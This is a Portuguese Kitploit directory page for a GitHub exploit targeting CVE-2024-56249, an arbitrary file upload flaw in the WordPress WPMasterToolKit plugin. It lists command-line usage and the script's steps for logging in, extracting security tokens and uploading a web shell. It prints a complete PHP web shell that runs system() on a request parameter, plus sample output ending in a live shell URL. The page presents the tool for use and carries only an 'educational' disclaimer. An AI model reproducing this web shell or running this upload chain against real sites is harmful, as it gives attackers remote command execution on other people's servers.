Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-56249 — Plugin WPMasterToolKit WordPress <= 1.13.1 - Vulnerabilidade de upload arbitrário de arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-56249
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2024-56249

CVE-2024-56249

Plugin WPMasterToolKit WordPress <= 1.13.1 - Vulnerabilidade de upload arbitrário de arquivos

Ver Repositório
111há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛠️ Exploit do WordPress Master Toolkit (CVE-2024-56249)

🌟 Visão Geral

Este script explora uma vulnerabilidade de Upload de Arquivo Arbitrário no plugin WPMasterToolKit do WordPress, permitindo que um atacante envie um web shell para o servidor. A vulnerabilidade existe nas versões <= 1.13.1 do plugin.

📝 Detalhes do CVE

  • ID do CVE: CVE-2024-56249
  • Publicado: 2025-01-02
  • Atualizado: 2025-01-02
  • Descrição: A vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso no Webdeclic WPMasterToolKit permite enviar um Web Shell para um Servidor Web.
  • CWE: CWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso
  • Pontuação CVSS: 9.1 (Crítica)
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 Uso

Para explorar esta vulnerabilidade, use o seguinte comando:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Parâmetros

  • -u / --url: URL do WordPress alvo (ex.: http://192.168.100.74:888/wordpress)
  • -un / --username: nome de usuário administrador do WordPress
  • -p / --password: senha do administrador do WordPress
  • -fp / --filepath: caminho de upload do arquivo (padrão: wp-content/uploads/2025/03)
  • -fn / --filename: nome do arquivo a enviar (padrão: shell.php)

🧩 Explicação do Script

🔍 1. Sondar a Vulnerabilidade

O script começa sondando a URL alvo para verificar se ela é vulnerável ao CVE-2024-56249, checando a versão do plugin WPMasterToolKit.

🔑 2. Autenticar no WordPress

Em seguida, ele tenta fazer login no painel administrativo do WordPress usando as credenciais fornecidas.

🛡️ 3. Extrair Tokens de Segurança

Após o login bem-sucedido, o script extrai os tokens de segurança necessários (nonce e token) para o upload do arquivo.

📤 4. Implantar Payload

Ele envia o arquivo especificado (ex.: um web shell) para o servidor alvo usando os tokens extraídos.

✅ 5. Verificar o Upload

Por fim, o script verifica se o arquivo foi enviado com sucesso, checando sua acessibilidade através da URL alvo.

📂 Nota

Certifique-se de que o arquivo shell (ex.: shell.php) esteja no mesmo diretório do script antes de executá-lo. Isso é necessário para que o script localize e envie o arquivo com sucesso.

Exemplo de Arquivo Shell (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Exemplo

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Saída

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Uso do Script

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais. Use-a por sua conta e risco. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


Script de exploit por Nxploit | Khaled Alenazi

Baixar ferramenta